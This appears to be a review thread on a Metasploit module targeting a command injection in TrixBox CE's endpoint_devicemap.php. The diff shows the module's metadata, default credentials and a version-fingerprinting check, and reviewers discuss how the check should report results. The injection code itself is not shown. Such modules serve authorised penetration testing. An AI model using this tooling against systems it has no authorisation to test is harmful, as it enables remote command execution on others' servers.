modules/exploits/unix/webapp/trixbox_ce_endpoint_devicemap_rce.rb

```diff
@@ -0,0 +1,117 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'TrixBox CE endpoint_devicemap.php Authenticated Command Execution',
+        'Description' => %q{
+          This module exploits a post-authentication OS command injection
+          vulnerability found in Trixbox CE <= v2.8.0.4 in the "network" POST
+          parameter of the "/maint/modules/endpointcfg/endpoint_devicemap.php"
+          page. Successful exploitation allows for arbitrary command execution
+          on the underlying operating system as the "asterisk" user.
+        },
+        'Author' => [
+          # Obrela Labs Team - Discovery and Metasploit module
+          'Anastasios Stasinopoulos (@ancst)'
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix'],
+        'Arch' => ARCH_CMD,
+        'DisclosureDate' => 'Apr 28 2020',
+        'Privileged' => false,
+        'Payload' =>
+          {
+            'Compat' =>
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'perl'
+              }
+          },
+        'Targets' =>
+          [
+            [ 'Trixbox CE <= v2.8.0.4', {}]
+          ],
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('HttpUsername', [ true, 'User to login with', 'maint']),
+        OptString.new('HttpPassword', [ true, 'Password to login with', 'password']),
+      ]
+    )
+  end
+
+  def check
+    fingerprint = 'Endpoint Manager Module Version: 2.6.3'
+    uri = normalize_uri(target_uri.path, '/maint/modules/endpointcfg/endpointcfg.php')
+    user = datastore['HttpUsername']
+    pass = datastore['HttpPassword']
+    print_status("#{rhost}:#{rport} - Authenticating using \"#{user}:#{pass}\" credentials...")
+    res = send_request_cgi({
+      'uri' => uri,
+      'method' => 'GET',
+      'authorization' => basic_auth(user, pass)
+    })
+    unless res
+      return CheckCode::Unknown('Connection failed')
+    end
+    unless res.body.include?(fingerprint)
+      return CheckCode::Safe
+    end
+
+    CheckCode::Vulnerable
```

Comment:
`CheckCode::Vulnerable` is reserved for instances where the target is confirmed to be vulnerable. `CheckCode::Appears` should be used in instances where the vulnerability is inferred from version detection.

```suggestion
    CheckCode::Appears
```

Reply:
Reopening as I don't think this was resolved and I don't see any change to `CheckCode::Appears` as @bcoles recommended. Please hold off on editing this though until we can determine how to best address the `check` method.

Reply:
@gwillcox-r7 i updated the check with sleep delays

Reply:
As @bcoles discussed, using sleep() calls may not be the best option, but seeing as its the most accurate way to detect if the target is vulnerable, and given that @bcoles stated that if we do go with the `sleep()` approach we could use `CheckCode::Vulnerable`, I'm going to mark this as resolved as I have more accurate comments regarding this `check` method below.